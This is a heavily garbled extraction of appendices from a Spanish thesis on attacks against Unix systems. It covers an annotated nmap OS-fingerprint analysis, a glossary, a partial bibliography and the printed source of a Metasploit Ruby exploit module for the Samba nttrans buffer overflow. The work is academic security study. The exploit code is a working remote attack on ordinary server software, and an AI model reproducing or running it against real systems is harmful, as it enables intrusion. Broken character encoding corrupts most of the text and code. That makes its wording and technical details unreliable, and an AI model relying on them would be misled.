9=3>are: No eDa!t O. mat!'e for 'o t 98f Eou 6no> >'at O. i running on it4 ee 'ttp:;;in e!ure.org;nmap; ubmit; :. 2$*/I* 6ingerprint: 4-:-$%9!JR..1 W)R./2W42R21W$2R1W$FR 0..0W*JR8W)-R1WBR8 WGR000$29W2GR.0+ $(1. 4-:W*R,86N6.&un=no>n&linu,&gnu"-CH!-*R101WB$)R2WI-/R108W2IRIWIIRIW--RW2-R2 4-:1"-CH!-*R100WB$)R1WI-/R10CW2IRIWIIRIW--RW2-R20"-CH!-*R10.WB$)R1WI-/R10% 4-:W2IRIWIIRIW--R-W2-R21"-CH!-*R101WB$)R1WI-/R108W2IRIWIIRIW--RW2-R20"-CH! 4-:-*R101WB$)R1WI-/R100W2IRIWIIRIW--RW2-R21"4*-!41RG1(.9L -211W42RG1089L 4-:211W4 RG2809L 99211W4.RG1(.9L -211W41RG2189L -211W46RG109-211"LI9!L1R+ ++ 4-:+WL2R++++WL R++++WL.R++++WL1R++++WL6R++++"C$9!/R8W)+R8W2R.0WLR++++ W4RG1( 4-:.9L -79W$$R9WHR"21!/R8W)+R8W2R.0W-R4W%R-TW+R%-W/)R0WHR"22!/R9"2 !/R8

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2.- de 22O

Ane9o C. ( Ane9o C. Anlisis de una /ir a FC!&7!


W)+R 4-:8W2R.0WLR++++W-R4W%R-TW+R%-W4RG1099L -211W/)R0WHR"2.!/R8W)+R8 W2R.0WLR0W4-:R%W%RXW+R/W4RW/)R0WHR"21!/R8W)+R8W2R.0WLR0W-RXW%R-TW+R%/W4R W/)R0WHR"26!/ 4-:R8W)+R8W2R.0WLR0W-R%W%RXW+R/W4RW/)R0WHR"20!/R8W)+R8W2R.0WLR0W-RXW%RW+R% 4-:/W4RW/)R0WHR"F1!/R8W)+R9W2R.0W24-R0WI*7R 8WF9R0W/I*7RBW/I)RBW/I*$:RB W/F$ 4-::RBW/F7RBW/F)RB"IC!/R8W)+IR-W2R.0W24-IR-W$)R-W-IR-W)7IR-" Kptime: 0.000 7aE 9 in!e &e7 #pr ( 15:06:09 (00): Net>or6 Di tan!e: 1 'op T,P .equen!e Pre7i!tion: Diffi!u"tE1(61 9Hoo7 "u!6`: 8P 8D .equen!e Heneration: 8n!rementa" $ea7 7ata fi"e from: ;'ome;mar!e"o; r!;nmap;; 'are;nmap O. 7ete!tion performe7. P"ea e report anE in!orre!t re u"t at 'ttp:;;in e!ure.org;nmap; ubmit; . Nmap 7one: 1 8P a77re 91 'o t up: !anne7 in (7.031 e!on7 $a> pa!6et ent: (09) 996.1(05C: F $!@7: 1790 973.66+5C:

Co o se "uede ver# los C<etr'ing ?, detection ;tr' c*>D in/or an sobre la ejecuci8n de cada uno de los 5 tests detallados en el a"artado 5.*.*. :uego# co o no "osee la /ir a del ,? re oto en su B5# @ a" la i "ri e "or "antalla. El ,? en cuesti8n es un FreeB,5 +..# cu'a /ir a la versi8n 1.5- de @ a" aGn no "osee*+5. :uego de "rocesar un "oco el te9to del /inger"rint ;i "reso as) "or @ a" a "ro"8sito "ara /acilitar el "roceso de re"orte del "ri era instancia%
-$%9!=1+.53 D1+;( OT1(1 ,T11 ,K130++7 P=1/ D.11 H1/ 31000,(9 T31+7B3,C1+ P1D)6A6+-un6no>n-"inuD-gnu" -CH!.P1105 H,D1( 8.$110) T818 8818 ..1. T.1(1" -CH!.P1100 H,D11 8.$110< T818 8818 ..1. T.1(0" -CH!.P110+ H,D11 8.$110# T818 8818 ..1. T.1(1" -CH!.P1105 H,D11 8.$110) T818 8818 ..1. T.1(0" -CH!.P1105 H,D11 8.$1107 T818 8818 ..1. T.1(1" 4*-!O1135C+N&3.T11 O(1357)N&3.T11 O313()0N&3NNT11 O+135C+N&3.T11 O513(1)N&3.T11 O613109.T11" LI9!&11BBBB &(1BBBB &31BBBB &+1BBBB &51BBBB &61BBBB" C$9!$1/ DB1/ T1+0 &1BBBB O135C+N&3.2N ,,1N R1" 21!$1/ DB1/ T1+0 .1O #1.P B1#. $D10 R1" 22!$1N" 2 !$1/ DB1/ T1+0 &1BBBB .1O #1.P B1#. O13109N&3.T11 $D10 R1" 2.!$1/ DB1/ T1+0 &10 .1# #1U B1$ O1 $D10 R1" 21!$1/ DB1/ T1+0 &10 .1U #1.P B1#$ O1 $D10 R1" 26!$1/ DB1/ T1+0 &10 .1# #1U B1$ O1 $D10 R1" 20!$1/ DB1/ T1+0 &10 .1U #1. B1#$ O1 $D10 R1" F1!$1/ DB1N T1+0 TO.10 8P213) KN10 $8P21H $8D1H $8P,51H $K,51H $K21H $KD1H" IC!$1/ DB81. T1+0 TO.81. ,D1. .81. D281."

is o># se "uede obtener esto en

*+5 Cabe aclarar que la Glti a versi8n de @ a"# la 1.J. 'a inclu'e la /ir a de este ,? en su Base. Fa bin se "uede obtener la Glti a versi8n del arc$ivo con la base de /ir as de @ a" Cn a"( os(dbD en la siguiente 2<:% $tt"%&&n a".org&data&n a"(os(db ' luego ree "lazar el original. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2.1 de 22O

Ane9o C. ( Ane9o C. Anlisis de una /ir a FC!&7!

:o que "ri ero se $izo /ue% eli inar el "re/ijo C?,%D en cada l)nea ' agregar un /in de l)nea luego de cada "arntesis de cierreH des"us se unieron en una is a l)nea las cadenas que quedaron CcortadasD# ' se identi/ic8 con rojo los resultados de los di/erentes probes. !or Glti o# los s) bolos de "orcentaje se eli inaron ;s8lo indica una concatenaci8n># ' los "ar etros se colorearon con azul. :uego# "ara relacionar este /inger"rint con el "roceso e9"licado en el a"artado 5.*.*# se agregaron co entarios alrededor del te9to ' se agru"aron con res"ecto a cada test "ara /acilitar la co "rensi8n del lector# quedando de la siguiente anera%
N Dato 7e" e !aneo: =er i%n 7e Nmap4 P"ataforma4 Be!'a;?ora4 et!. -$%9!=1+.53 D1+;( OT1(1 ,T11 ,K130++7 P=1/ D.11 H1/ 31000,(9 T31+7B3,C1+ P1D)6A6+-un6no>n-"inuD-gnu" N .O $emoto BreeC.D 7.0-C<T#+ - 7.0-.T#C2< N N Probe T,P en@ia7o : N 1111111111111111 N Te t 1. Henera!i%n 7e .e!uen!ia 9.<R4 OP.4 &8N E T1:. N 1.1 Probe .<R. N Par]metro !a"!u"a7o por !a7a paquete re!ibi7o 7e" Te t 1: N .P: T,P 8.N equen!e pre7i!tabi"itE in7eD N H,D: T,P 8.N Hreate t !ommon 7enominator N 8.$: T,P 8.N !ounter rate N T84884..: T,P 8P8D4 8,3P 8P8D4 .'are7 8P8D N T.: T,P Time tamp option a"gorit'm -CH!.P1105 H,D1( 8.$110) T818 8818 ..1. T.1(1" -CH!.P1100 H,D11 8.$110< T818 8818 ..1. T.1(0" -CH!.P110+ H,D11 8.$110# T818 8818 ..1. T.1(1" -CH!.P1105 H,D11 8.$110) T818 8818 ..1. T.1(0" -CH!.P1105 H,D11 8.$1107 T818 8818 ..1. T.1(1" N 1.( Probe OP.: Op!ione T,P N Op!ione T,P obteni7a por !a7a paquete en@ia7o 7e" Te t 1: 4*-!O1135C+N&3.T11 O(1357)N&3.T11 O313()0N&3NNT11 O+135C+N&3.T11 O513(1)N&3.T11 O613109.T11" N 1.3 &8N: Tamafo 7e =entana T,P 8ni!ia" re!ibi7o por !a7a paquete N en@ia7o 7e" Te t 1. <n ?eDa7e!ima". LI9!&11BBBB &(1BBBB &31BBBB &+1BBBB &51BBBB &61BBBB" N 1.+ Probe T1: N Par]metro obteni7o en to7o "o paquete N abe que er]n to7o igua"e : N $: $e pon i@ene 9$: N DB: 9DonJt Bragment Cit: N T4TH: 8P 8nitia" TT24 8P 8nitia" TT2 Hue N .: T,P .equen!e number N #: T,P #!6 Number 9#: N B: T,P B"ag N $D: T,P $.T Data ,'e!6 um N R: T,P mi !. Ruir6 21!$1/ DB1/ T1+0 .1O #1.P B1#. $D10 R1" N Te t (. <!o 8,3P 98<:. en@ia7o 7e" Te t 1 9Ea e

9No a"ma!ena7o:

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2.5 de 22O

Ane9o C. ( Ane9o C. Anlisis de una /ir a FC!&7!


N Par]metro Obteni7o : N $: $e pon i@ene 9$: N DB8: DonJt Bragment Cit 8,3P N T4TH: 8P 8nitia" TT24 8P 8nitia" TT2 Hue N TO.8: 8P To. for 8,3P $e pon e N ,D: 8,3P $e pon e ,o7e N .8: 8,3P .equen!e Number N D28: 8P Data 2engt' for 8,3P $e pon e IC!$1/ DB81. T1+0 TO.81. ,D1. .81. D281."

9No a"ma!ena7o:

N Te t 3. T,P <Dp"i!it !onge tion notifi!ation 9<,N: N Par]metro Obteni7o : N $: $e pon i@ene 9$: N DB: 9DonJt Bragment Cit: N T4TH: 8P 8nitia" TT24 8P 8nitia" TT2 Hue 9No a"ma!ena7o: N &: T,P 8nitia" &in7o> .iOe N O: T,P Option N ,,: <Dp"i!it ,onge tion Notifi!ation N R: T,P 3i !. Ruir6 C$9!$1/ DB1/ T1+0 &1BBBB O135C+N&3.2N ,,1N R1" N Te t +. T,P. Probe T( a" T7. N Par]metro !a"!u"a7o por !a7a Probe: N $: $e pon i@ene 9$: N DB: 9DonJt Bragment Cit: N T4TH: 8P 8nitia" TT24 8P 8nitia" TT2 Hue 9No a"ma!ena7o: N &: T,P 8nitia" &in7o> .iOe N .: T,P .equen!e number N #: T,P #!6 Number N B: T,P B"ag N O: T,P Option N $D: T,P $.T Data ,'e!6 um N R: T,P 3i !. Ruir6 22!$1N" 2 !$1/ DB1/ T1+0 &1BBBB .1O #1.P B1#. O13109N&3.T11 $D10 R1" 2.!$1/ DB1/ T1+0 &10 .1# #1U B1$ O1 $D10 R1" 21!$1/ DB1/ T1+0 &10 .1U #1.P B1#$ O1 $D10 R1" 26!$1/ DB1/ T1+0 &10 .1# #1U B1$ O1 $D10 R1" 20!$1/ DB1/ T1+0 &10 .1U #1. B1#$ O1 $D10 R1" N Probe 5. KDP en@ia7o a un puerto !erra7o en e pera 7e un 8,3P Port N Knrea!'ab"e N Par]metro ,a"!u"a7o N $: $e pon i@ene 9$: N DB: 9DonJt Bragment Cit: N T4TH: 8P 8nitia" TT24 8P 8nitia" TT2 Hue 9No a"ma!ena7o: N TO.: 8P TEpe of .er@i!e N 8P2: 8P Tota" 2engt' N KN: Knu e7 port unrea!'ab"e fie"7 nonOero N $8P2: $eturne7 probe 8P tota" "engt' @a"ue N $8D: $eturne7 probe 8P 8D @a"ue N $8P,5: 8ntegritE of returne7 probe 8P !'e!6 um @a"ue N $K24$K,5: 8ntegritE of returne7 probe KDP "engt' an7 !'e!6 um N $KD: 8ntegritE of returne7 KDP 7ata F1!$1/ DB1N T1+0 TO.10 8P213) KN10 $8P21H $8D1H $8P,51H $K,51H $K21H $KD1H"

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2.J de 22O

Ane9o 5. ( Ane9o 5. C8digo /uente de los E9"loits 2tilizados

Anexo D. /-di)o =uente de los Fxploits Utili3ados


A continuaci8n se adjunta el c8digo /uente del "ri er e9"loit de los dos utilizados en la secci8n +.2# "g. *12. Est escrito en lenguaje <ub' ' utiliza el Metas"loit Fra eIor6 v-.*H se inclu'8 sta versi8n ;' no la del 2.+> "orque e9"lota la vulnerabilidad en /or a si ilar ' la idea es los e9"loits con la Glti a versi8n del ostrar c8 o se "rogra an is o. Fa bin se encuentra online "ara su

consulta en la direcci8n% $tt"%&& arcelo/ernandez.in/o&tesis&nttrans.rb.


NN N M87: nttran .rb 5365 (00)-01-(7 0(:():11U '7m M NN NN N T'i fi"e i part of t'e 3eta p"oit Brame>or6 an7 maE be ubYe!t to N re7i tribution an7 !ommer!ia" re tri!tion . P"ea e ee t'e 3eta p"oit N Brame>or6 >eb ite for more information on "i!en ing an7 term of u e. N 'ttp:;;meta p"oit.!om;proYe!t ;Brame>or6; NN require Jm f;!oreJ module 3 f class <Dp"oit ::3u"ti::.amba::NTTran AO@erf"o> T 3 f::<Dp"oit::$emote in!"u7e <Dp"oit::$emote::.3C de6 initia"iOe9info 1 ab: super9up7ateAinfo9info4 JNameJ JDe !riptionJ b4 J#ut'orJ J2i!en eJ J=er ionJ J$eferen!e J 04 JPri@i"ege7J JPaE"oa7J a

1> J.amba nttran 1> Sqa

O@erf"o>J4

1> - J'7mJ 04 1> 3.BA28,<N.<4 1> JM$e@i ion: 5365 MJ4 1> - JC8DJ4 J7106J 04 - J,=<J4 J(003-00)5J 04 1> true4 1> J.pa!eJ 1> 10(+4 JCa7,'ar J 1> V[D00V4 J3inNop J 1> 51(4

JTarget J

1> -V.amba (.(.D 2inuD D)6V4 a J#r!'J 1> #$,?AG)64 JP"atformJ 1> J"inuDJ4 J$et J 1> -0D010(030+4 0D+1+(+3++04 b4 04 04 JDi !"o ureDateJ 1> J#pr 7 (003J:: regi terAoption 9-Opt::$PO$T9139:04 sel6.class:

b4

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2.+ de 22O

Ane9o 5. ( Ane9o 5. C8digo /uente de los E9"loits 2tilizados


end de6 eDp"oit # $%$&'fc()& pattern 1 $eD::TeDt.patternA!reate91(000: pattern-53(4 +0 1 -0D)1b)+7!0.pa!69J=J: pattern-)364 paE"oa7.en!o7e7."engt'0 1 paE"oa7.en!o7e7 # $%$&'b&'*& !onne!t mbA"ogin targAa77re 1 0Dfffbb770

# # +end a ,TTrans request -ith Parameter.ountTotal set to the buffer length # ub!omman7 param bo7E etupA!ount etupA7ata data 1 param 1 1 1 1 1 P 1 JJ JJ 0 JJ bo7E

p6t 1 ,ON.T::.3CANTT$#N.AP5T.ma6eA tru!t sel6. imp"e.!"ient. mbA7efau"t 9p6t-JPaE"oa7J0-J.3CJ0: ba eAoff et 1 p6t.toA ."engt' P 9 etupA!ount Q (: - + paramAoff et 1 ba eAoff et 7ataAoff et 1 paramAoff et P param."engt' p6t-JPaE"oa7J0-J.3CJ0.@-J,omman7J0 1 ,ON.T::.3CA,O3ANTAT$#N.#,T p6t-JPaE"oa7J0-J.3CJ0.@-JB"ag 1J0 1 0D1) p6t-JPaE"oa7J0-J.3CJ0.@-JB"ag (J0 1 0D(001 p6t-JPaE"oa7J0-J.3CJ0.@-J&or7,ountJ0 1 19 P etupA!ount p6t-JPaE"oa7J0.@-JParam,ountTota"J0 11(000 p6t-JPaE"oa7J0.@-JData,ountTota"J0 1 bo7E."engt' p6t-JPaE"oa7J0.@-JParam,ount3aDJ0 1 10(+ p6t-JPaE"oa7J0.@-JData,ount3aDJ0 1 6550+ p6t-JPaE"oa7J0.@-JParam,ountJ0 1 param."engt' p6t-JPaE"oa7J0.@-JParamOff etJ0 1 paramAoff et p6t-JPaE"oa7J0.@-JData,ountJ0 1 bo7E."engt' p6t-JPaE"oa7J0.@-JDataOff etJ0 1 7ataAoff et p6t-JPaE"oa7J0.@-J.etup,ountJ0 1 etupA!ount p6t-JPaE"oa7J0.@-J.etupDataJ0 1 etupA7ata p6t-JPaE"oa7J0.@-J.ub!omman7J0 1 ub!omman7 p6t-JPaE"oa7J0.@-JPaE"oa7J0 1 data sel6. imp"e.!"ient. mbA en79p6t.toA : a!6 1 sel6. imp"e.!"ient. mbAre!@Apar e9,ON.T::.3CA,O3ANTAT$#N.#,T: # # +end a ,TTrans secondar/ request -ith the magic displacement # param 1 pattern bo7E 1 JJ data 1 param P bo7E p6t 1 ,ON.T::.3CANTT$#N.A.<,OND#$/AP5T.ma6eA tru!t sel6. imp"e.!"ient. mbA7efau"t 9p6t-JPaE"oa7J0-J.3CJ0: ba eAoff et 1 p6t.toA ."engt' - + paramAoff et 1 ba eAoff et 7ataAoff et 1 paramAoff et P param."engt'

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2.O de 22O

Ane9o 5. ( Ane9o 5. C8digo /uente de los E9"loits 2tilizados


p6t-JPaE"oa7J0-J.3CJ0.@-J,omman7J0 1 ,ON.T::.3CA,O3ANTAT$#N.#,TA.<,OND#$/ p6t-JPaE"oa7J0-J.3CJ0.@-JB"ag 1J0 1 0D1) p6t-JPaE"oa7J0-J.3CJ0.@-JB"ag (J0 1 0D(001 p6t-JPaE"oa7J0-J.3CJ0.@-J&or7,ountJ0 1 1) p6t-JPaE"oa7J0.@-JParam,ountTota"J0 1 param."engt' p6t-JPaE"oa7J0.@-JData,ountTota"J0 1 bo7E."engt' p6t-JPaE"oa7J0.@-JParam,ountJ0 1 param."engt' p6t-JPaE"oa7J0.@-JParamOff etJ0 1 paramAoff et p6t-JPaE"oa7J0.@-JParamDi p"a!eJ0 1 targAa77re p6t-JPaE"oa7J0.@-JData,ountJ0 1 bo7E."engt' p6t-JPaE"oa7J0.@-JDataOff etJ0 1 7ataAoff et p6t-JPaE"oa7J0.@-JPaE"oa7J0 1 data sel6. imp"e.!"ient. mbA en79p6t.toA : a!6 1 sel6. imp"e.!"ient. mbAre!@Apar e9,ON.T::.3CA,O3ANTAT$#N.#,TA.<,OND#$/: 'an7"er end en7 en7

Con res"ecto al segundo e9"loit# "or una cuesti8n estricta ente de es"acio# se o iti8 su inclusi8n aqu). ,in e bargo# se encuentra online# en la siguiente direcci8n% $tt"%&& arcelo/ernandez.in/o&tesis&-1O.c El is o consiste en *12O l)neas escritas en lenguaje C# ' s8lo necesita un ,? ti"o 2ni9 ' un co "ilador de C ;t)"ica ente PCC> "ara ser co "ilado ' ejecutado. /omo conclusi-n 9a! que resaltar la ventaja que o=rece 1A2 para la creaci-n de exploits% !a que provee un entorno pro(ado con componentes reutili3a(les ! extensi(les para el desarrollo% creaci-n e investi)aci-n de exploits.

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2.0 de 22O

Ane9o E. ( Ane9o E. Plosario de Fr inos

Anexo F. Mlosario de Trminos


A4I% 4pplication Programming 6nterface ;C7nter/az de !rogra aci8n de A"licaci8nD> es un tr ino que re"resenta la inter/az o ca"a de so/tIare que brinda un deter inado "rogra a "ara ser utilizado "or otro. Esto "er ite la reutilizaci8n de so/tIare. !or eje "lo# si un "rogra a necesita encri"tar ciertos datos# "uede $acer uso de un biblioteca de ci/rado de datos $ec$a "or terceros# utilizando su A!7 "ara co unicarse con ella. 2n ,iste a ?"erativo ta bin "rovee A!7s a sus di/erentes co "onentes "ara los "rogra as que se ejecuten sobre l. AR4% Es un "rotocolo de Ca"a 2&- del odelo ?,7# sirve "ara resolver direcciones de Ca"a 2 dada ediante una "etici8n A<! la obtiene. a'or)a de los "rotocolos enviar un ensaje de una direcci8n de Ca"a -. !or eje "lo# teniendo la direcci8n 7! de un servidor# un cliente "ara co unicarse debe saber la direcci8n MACH CanuncioD al cliente que se conecta. Este )anner D>Titular?E% Es una "rctica co Gn de la

ensaje se lla a 5anner en la jerga.

/luster% Conjunto de co "utadoras que trabajan en gru"o ' actGan co o un nodo Gnico e indivisible# en "os de lograr un objetivo su ando el recurso de cada uno de sus co "onentes. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&Co "uterUcluster D1S: Sona Desmilitari3ada ;C(emilitari$ed KoneD>. !arte de la red de una organizaci8n que est direccionada ' accesible "Gblica ente desde 7nternet ;general ente># se"arada de la :A@ de la is a. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&5e ilitarizedUzoneU]2Oco "uting]20 DNA% (omain Game S1stem H ,iste a de @o bres de 5o inio. Es un servicio a "lia ente utilizado# que tiene el objetivo de traducir no bres del ti"o $ost.do inio ;"or eje "lo III.unlu.edu.ar> a una direcci8n 7!# "or eje "lo# 2...**..*O5.21J. DoA: Dene)aci-n de Aervicio ;C(enial of ServiceD>. Error de un so/tIare ;general ente un servicio de red> al anejar ciertos datos de entrada o condiciones que "rovocan que el nor al s situaciones% odi/icadas># dese "eBo del servicio reduzca su velocidad ;'a que su consu o de C!2# <AM u otros recursos crece indiscri inada ente># $asta volverlo ino"erable. El tr ino abarca etc. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&5enialUo/Uservice Fntrada Fstndar DATDINE% Aalida Fstndar DATD0UTE% Aalida de Fstndar de Frrores DATDFRRE% ,on canales de co unicaci8n con el entorno que e9isten "or cada "roceso 2ni9 del siste a. <e"resentan la entrada de datos# otro la salida ' el Glti o la salida de res"ectiva ente. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&,tandardUstrea s Lo): 2na entrada de log es uno o s registros al acenados en algGn arc$ivo que re"resenta un evento en "articular# co o una alerta# con el objetivo de guardar un rastro de auditor)a que ser le)do "or el ad inistrador del siste a. 2rame@or:% En so/tIare# un frame.ork ;C arco de trabajoD en ingls> es una biblioteca de "rogra aci8n "ensada co o un gran C"aqueteD que resuelve un cierto "roble a con un nivel de abstracci8n u' grande "ara el "rogra ador que la utiliza. !uede contener o requerir varias bibliotecas "ara su correcto /unciona iento. Ler% $tt"%&&III.code"roject.co &RB&arc$itecture&4$at7sAFra eIor6.as"9 Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2*. de 22O ensajes de error. !or de/ecto ;' co Gn ente> son el teclado# la "antalla ' la "antalla ta bin o un arc$ivo de log# interru"ci8n o alteraci8n de la cone9i8n de red# saturaci8n de "eticiones ;nor ales o

Ane9o E. ( Ane9o E. Plosario de Fr inos Fa bin% $tt"%&&en.Ii6i"edia.org&Ii6i&,o/tIareU/ra eIor6 8ilos D*hreadsE% :os ,?s consu en todos los odernos "roveen un ecanis o de "rocesos ClivianosD o t$reads# que e oria con el "roceso "rinci"al que los crea# u' co Gn en ' a di/erencia de los "rocesos C"esadosD# co "arten enos recursos ' requieren ,iste as. Ler%

enos ca bios de conte9to# entre otras ventajas. :a

desventaja es el au ento de la co "lejidad# "ero $o' en d)a es una caracter)stica $tt"%&&en.Ii6i"edia.org&Ii6i&F$readU]2Oco "uterUscience]20 8as9% 2n Has o /unci8n de dis"ersi8n es una /unci8n

$tt"%&&en.Ii6i"edia.org&Ii6i&!rocessU]2Oco "uting]20

ate tica que a "artir de un "ar etro de

entrada# genera un valor Gnico de salida ;cu'as "robabilidades de ser generado "or otro "ar etro son )n/i as>. =a' algorit os de $as$ estndar# co o "or eje "lo M55 ' ,=A(*. Ler%$tt"%&&en.Ii6i"edia.org&Ii6i&Cr'"togra"$icU$as$U/unction 8one!pot% 2n $one'"ot ;Ctarro de ielD> es un siste a Ctra "aD instalado adrede "ara ca"tar la onitorear los intentos de atenci8n de "osbiles intrusos# "robable ente con vulnerabilidades sencillas de vencer# con el objetivo de desviar la atenci8n de los $osts que s) son de i "ortancia ' ataque "ara bloquearlos ' a"render las tcnicas utilizadas "or los intrusos. NAT Q +etwork Address *ranslation ;Fraducci8n de 5irecciones de <ed>% Fcnica "ara reescribir la direcci8n origen o destino de un "aquete 7! en un dis"ositivo que aneja dic$os "aquetes. !or u' /recuentes ta bin. eje "lo# es e "leada co Gn ente en los dis"ositivos de acceso a internet "ara Ccon utarD una Gnica 7! "Gblica entre varias 7!s "rivadas de una :A@# entre otros usos Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&@etIor6UaddressUtranslation 0=uscaci-n ;so/tIare>% Fcnica que odi/ica sustancial ente un "rogra a sin alterar su edida su /unciona iento original# con el objetivo de Cca u/larloD o di/icultar en gran del "rogra a. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&?b/uscatedUcode 0pcode% 2na instrucci8n de "rocesador se co "one general ente "or un c8digo de o"eraci8n ' dos o"erandos. El "ri ero en ingls se lo abrevia co o ?"code# que bsica ente indica qu $acer con los dos o"erandos que se le indica. !or eje "lo# en lenguaje ensa blador# CM?L AA# BAD es una instrucci8n donde se co"ia el contenido del registro BA al AA ;segGn la no enclatura de 7ntel># ' M?L es el ?"code. ?tros ?"codes CM!# Call# A55# M2:# !2,=# !?!# etc. Ler% Fabla r"ida de ?"codes O.OJ% $tt"%&&III.jegerle$ner.co &intel&o"codeUes.$t l 7ntel Arc$itecture ,o/tIare 5evelo"erMs Manual# Lolu e 2% 7nstruction ,et <e/erence Manual% $tt"%&&develo"er.intel.co &design&"entiu & anuals&21-*0*.$t 4enetration Testin)% Fest de "enetraci8nH se lo conoce co o un "roceso t)"ico de las auditor)as de seguridad# donde se si ula ser un crac6er intentando vulnerar la seguridad de una organizaci8n o de un siste a de la is a. 4rox!% 2n "ro9' es un so/tIare o dis"ositivo que o/icia de inter ediario entre un cliente ' un servidor. !or eje "lo# un "rogra a establece cone9i8n con el "ro9' ' le "ide acceder a un cierto equi"o&servicio# "or eje "lo una "gina IebH el "ro9' accede "or l ' lo devuelve al "rogra a original# evitando que ste tenga que acceder directa ente al "roveedor. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2** de 22O u' co unes en la arquitectura 9OJ inclu'en JM!#

co "rensi8n "or "arte de terceros. Co o e/ecto colateral "uede signi/icar ta bin una co "resi8n

Ane9o E. ( Ane9o E. Plosario de Fr inos RTT% :ound -rip -ime N Fie "o de Liaje 7da ' Luelta. Lalor general ente edido en

ilisegundos que esti a el tie "o entre el env)o ' rece"ci8n de un "aquete al ' desde el destino. !uede decirse que el dela1# latencia o de ora que introduce la red entre dos $osts es igual a <FF dividido 2. Acript% 2n scri"t es un "rogra a que general ente e9tiende a una a"licaci8n# escrita en un lenguaje inter"retado ' que t)"ica ente se encarga de auto atizar tareas. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&,cri"tingUlanguage A9ell% ,i bien en castellano la traducci8n literal es Cconc$aD o CcscaraD# en el a biente in/or tico se la conoce ta bin co o CConsolaD o CFer inalDH es una inter/az que "rovee el siste a al usuario en /or ato de te9to# que ace"ta 8rdenes o co andos que luego el siste a ejecuta. Fa bin se la suele lla ar C:7# "or Co and :ine 7nter/ace ;C7nter/az de :)nea de a'or)a de Co andoD># ant8ni o de P27 N Pra"$ical 2ser 7nter/ace ;C7nter/az Pr/ica de 2suarioD>. Aoc:ets Ra@% Es una A!7 de la ca"a de <ed de un ,iste a ?"erativo# "resente en la pa1load. @ a" ' la gran ellos# que "rovee acceso co "leto a los encabezados de las tra as a enviar ' recibidas# no s8lo al a'or)a de los "ort scanners o $erra ientas de red $acen uso de ella. ,poofing% C!arodiaD en castellano. CSpoofingD trata de un conjunto de tcnicas "ara /alsi/icar ' $acer "asar un ele ento invlido o no autorizado "or otro que s) lo est. AA8% Secure SHell ;C,$ell ,eguroD en castellano>. !rotocolo de red que brinda una inter/az de co andos a una quina en /or a re otaH a di/erencia de Felnet# <login# etc.# ,,= brinda autenticaci8n "or !R7 ' encri"taci8n del tr/ico. AAL% ,ecure ,oc6ets :a'er# Ca"a de ,oc6ets ,eguro. Es una versi8n anterior de lo que a$ora es F:,# con los is os objetivos ' caracter)sticas. utua ' encri"taci8n "ara "rotocolos /iables de la Ca"a de Frans"orte odelo FC!&7!>. TLA% Frans"ort :a'er ,ecurit'# ,ecuridad en la Ca"a de Frans"orte. Es un "rotocolo de seguridad que "rovee autenticaci8n del Modelo ?,7 ;FC! en el

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2*2 de 22O

&i(lio)ra=6a
A<!AUFF7% Ar"anet ( F$e First 7nternet# $tt"%&&III.livinginternet.co &i&ii.$t A<FUA!!F7@P% F$e Art o/ Finger"rinting ( ,lides# $tt"%&& d.$udora.de&"resentations&citunderground2..5(2 BE::% Multics Peneral 7n/or ation and FAV# $tt"%&&III.bell( labs.co &$istor'&uni9&so et$ingelse.$t l CMUFA.% F$e FA(.% 7ts "ast and "resent# $tt"%&&ed(t$elen.org&co "( $ist&F$eCo "Mus<e"&FCM<(L.O.$t l C<AK%,e' our Cra'. Autor% Cra' 7nc.# $tt"%&&III.cra'.co &aboutUcra'&se' ourcra'.$t l C,C?U7@EFBA,%7nternetIor6ing Basics. Autor% Cisco ,'ste s# $tt"%&&III.cisco.co &en&2,&docs&internetIor6ing&tec$nolog'&$andboo6&7ntro(to(7nternet.$t l C2=7% Colu bia 2niversit' Co "uting =istor'# $tt"%&&III.colu bia.edu&acis&$istor'&"d"*..$t l CKBPE?% A<!A@et :ogical Ma"# $tt"%&&III.c'bergeogra"$'.org&atlas&$istorical.$t l 5EC(4EB% F$e 5EC E ulation 4eb !age# $tt"%&&III.aracnet.co &`$eal'z$&dece u.$t l EB=:%F$e =eroic =ac6er% :egends o/ t$e Co "uter Age. Autor% Eri6 Bunvand# $tt"%&&III.cs.uta$.edu&`elb&/ol6lore&a/s("a"er&a/s("a"er.$t l E<B=%=oI Fo Beco e a =ac6er. Autor% Eric ,teven <a' ond# $tt"%&&catb.org&`esr&/aqs&$ac6er( $oIto.$t l E<==%A Brie/ =istor' o/ =ac6erdo . Autor% Eric ,teven <a' ond# $tt"%&&III.tu9edo.org&`esr E<JF% F$e Jargon File# $tt"%&&catb.org&jargon& E<JF=%Fr ino M$ac6erM. Autor% Larios# Eric <a' ond# $tt"%&&III.catb.org&jargon&$t l&=&$ac6er.$t l F7@PU!A,%RnoI Kour Ene '% !assive Finger"rinting. Autor% Craig , it$# !eter Prundl # $tt"%&&"roject.$one'net.org&"a"ers&/inger& F,F% Free ,o/tIare Fundation# $tt"%&&III./s/.org& F4A:R%FireIal6ing ( A Fraceroute(:i6e Anal'sis o/ 7! !ac6et <es"onses to 5eter ine PateIa' Access Control :ists. Autor% 5avid Polds it$# Mic$ael ,c$i// an# $tt"%&&III."ac6et/actor'.net&/ireIal6&/ireIal6(/inal."d/ P@2% P@2% P@2 is not 2ni9# $tt"%&&III.gnu.org& =ACRUBA,7C,%=ac6ing% F$e Basics. Autor% Qac$ar' 4ilson# Martin !oulin# 